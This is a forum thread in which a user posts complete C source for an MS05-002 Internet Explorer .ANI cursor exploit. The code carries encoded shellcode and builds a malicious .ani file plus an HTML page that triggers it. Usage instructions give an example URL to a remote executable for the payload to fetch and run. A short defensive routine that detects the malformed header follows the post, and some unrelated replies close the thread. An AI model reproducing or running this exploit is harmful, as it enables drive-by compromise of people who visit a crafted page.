For c++ programmers only !



  1. #1
    Join Date: Oct 2005 | Location: Maady | Posts: 1,819

    For c++ programmers only !

    Hey;
    This code simply demonstrates a bug in Windows 2000/NT/XP which executes an "ANI" file (cursor file) when opening a web site containing this script!

    It may be a bit old, but still "learnful".

    This bug was found by *** and the code was created by ***, finally edited by Amahdy, and here you are:

    Code:
    /*Edited By Amahdy That's all !*/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    /* ANI header */
    
    char aniheader[] =
    "\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
    "\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    
    /* jmp offset, no Jitsu */
    "\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
    "\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
    "\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
    "\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
    "\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
    "\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
    "\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    
    /* portbind shellcode */
    char shellcode[] =
    "\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
    "\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
    "\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
    "\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
    "\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
    "\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
    "\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
    "\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
    "\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
    "\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
    "\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
    "\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
    "\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
    "\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
    "\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
    "\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
    "\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
    "\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
    "\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
    "\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
    "\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
    "\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
    "\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
    "\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
    "\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
    "\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
    "\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
    "\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
    "\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
    "\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
    "\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
    "\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
    "\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
    "\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
    "\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
    "\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
    "\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
    "\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
    "\x27\x39\x72\x6F\x72\x17"
    "m00!";
    
    //#define SET_PORTBIND_PORT(buf, port)  *(unsigned short *)(((buf)+300)) = (port)
    
    unsigned char discl[] =
    "This is provided as proof-of-concept code only for educational"
    " purposes and testing by authorized individuals with permission"
    " to do so.";
    
    char html[] =
    "<html>\n"
    "(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
    "<br>Edited By Amahdy<br><a href =\""
    "http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
    "Patch (MS05-002)</a>\n"
    "<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
    "\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
    "</html>";
    
    unsigned short
    fixx(unsigned short p)
    {
          unsigned short r = 0;
          r  = (p & 0xFF00) >> 8;
          r |= (p & 0x00FF) << 8;
    
    return r;
    }
    
    void
    usage(char *prog)
    {
          printf("Usage:\n");
          printf("%s <file> <url to file>\n\n", prog);
          printf("eg: %s index \"http://www.blic.net/proggy.exe\"", prog);
          exit(0);
    }
    
    int
    main(int argc, char **argv)
    {
          FILE *fp;
          unsigned short port;
          char f[256+5] = "";
          char anib[912] = "";
    	  char newshellcode[686];
    
          printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
    	  printf("\n===Modifed and corrected by Amahdy=====================================\n\n");
          printf("%s\n\n", discl);
    	  if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
                  printf("[-] Size of shellcode must be <= 686 bytes\n");
                  return 0;
          }
          if (argc < 3) usage(argv[0]);
    
          if (strlen(argv[1]) > 256) {
                  printf("[-] Size of filename must be <=256 bytes\n");
                  return 0;
          }
    
          /* creating ani file */
          strcpy(f, argv[1]);
    	  strcat(f, ".ani");
          printf("[*] Creating %s file ...", f);
          fp = fopen(f, "wb");
          if (fp == NULL) {
                  printf("\n[-] error: can\'t create file: %s\n", f);
                  return 0;
          }
    
          memset(newshellcode,0x90,sizeof(shellcode)+strlen(  argv[2])+1);
          strcpy(newshellcode,shellcode);
          strcat(newshellcode,argv[2]);
          strcat(newshellcode,"\x01");
          memset(anib, 0x90, 912);
          memcpy(anib, aniheader, sizeof(aniheader)-1);
          memcpy(anib+sizeof(aniheader)-1, newshellcode, sizeof(newshellcode)-1);
          fwrite(anib, 1, 912, fp);
          printf(" Ok\n");
          fclose(fp);
          f[0] = '\0';
          strcpy(f, argv[1]);
          strcat(f, ".html");
          printf("[*] Creating %s file ...", f);
          fp = fopen(f, "wb");
          if (fp == NULL) {
                  printf("\n[-] error: can\'t create file: %s\n", f);
                  return 0;
          }
          sprintf(anib, html, discl, argv[1]);
          fwrite(anib, 1, strlen(anib), fp);
          printf(" Ok\n");
          fclose(fp);
    
    return 0;
    }
    I repeat: "edited and corrected" only, okay?
    I haven't totally upgraded it to C++, only some small portion of it...
    Now, how does it work?
    After making the exe file, drag it into the command line and put the file name and web address as arguments...
    ex:
    Code:
    myfile.exe index 678
    If you have a good antispyware/antivirus installed, you will get a clear virus alert.
    Programmer&Cracker CS
    MyBlog:Blog.Amahdy.com
    MyWebsite:www.Amahdy.com
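A defender-side check for the file shape this post describes, added here as an example and not part of the original post or its author's code: the documented ANI header chunk (anih) is 36 bytes, so a RIFF/ACON file whose anih chunk declares any other payload size (the post's header declares 0x37c) is malformed and should be rejected before any cursor parser touches it. The sample buffers are constructed inline and are not real cursors.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* The documented ANIHEADER structure is 36 bytes; an "anih" chunk that
 * declares any other payload size is malformed and must be rejected. */
#define ANIH_EXPECTED_SIZE 36u
static uint32_t rd32(const unsigned char *p) {          /* little-endian read */
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32(unsigned char *p, uint32_t v) {         /* little-endian write */
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/* Walk the top-level RIFF chunks of an ACON file. Returns 1 when every chunk
 * fits inside the buffer and the anih chunk is exactly 36 bytes, else 0 with
 * *reason set. LIST chunks are skipped as opaque; anih is always top-level. */
int ani_is_sane(const unsigned char *buf, size_t len, const char **reason) {
    size_t pos = 12;
    uint32_t riff_len;
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0) {
        *reason = "not a RIFF/ACON file"; return 0;
    }
    riff_len = rd32(buf + 4);
    if (riff_len < 4 || (size_t)riff_len + 8 > len) { *reason = "RIFF size exceeds buffer"; return 0; }
    while (pos + 8 <= len) {
        uint32_t csize = rd32(buf + pos + 4);
        if (csize > len - pos - 8) { *reason = "chunk size exceeds buffer"; return 0; }
        if (memcmp(buf + pos, "anih", 4) == 0 && csize != ANIH_EXPECTED_SIZE) {
            *reason = "anih chunk size is not 36"; return 0;
        }
        pos += 8 + csize + (csize & 1);                   /* chunks are word-aligned */
    }
    *reason = "ok";
    return 1;
}

/* Constructed sample (not a real cursor): RIFF/ACON holding one anih chunk
 * with the given declared size, payload filled with 0x90. Returns bytes written. */
size_t build_sample(unsigned char *out, size_t cap, uint32_t anih_size) {
    size_t total = 12 + 8 + (size_t)anih_size;
    if (total > cap) return 0;
    memset(out, 0x90, total);
    memcpy(out, "RIFF", 4); wr32(out + 4, (uint32_t)(total - 8));
    memcpy(out + 8, "ACON", 4);
    memcpy(out + 12, "anih", 4); wr32(out + 16, anih_size);
    return total;
}
```

Calling `build_sample(b, sizeof b, 892)` reproduces the 912-byte, 0x37c-anih layout of the post's file and `ani_is_sane` rejects it, while a 36-byte anih passes.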

  2. #2
    Join Date: Oct 2005 | Location: Maady | Posts: 1,819

    Must I put this in the C++ section?
    Last edited by Amahdy; 11-01-2007 at 01:27 PM.

  3. #3
    Join Date: Apr 2010 | Posts: 5

    Need the full solution of OOP 3rd edition by Robert Lafore?? Here is half only.
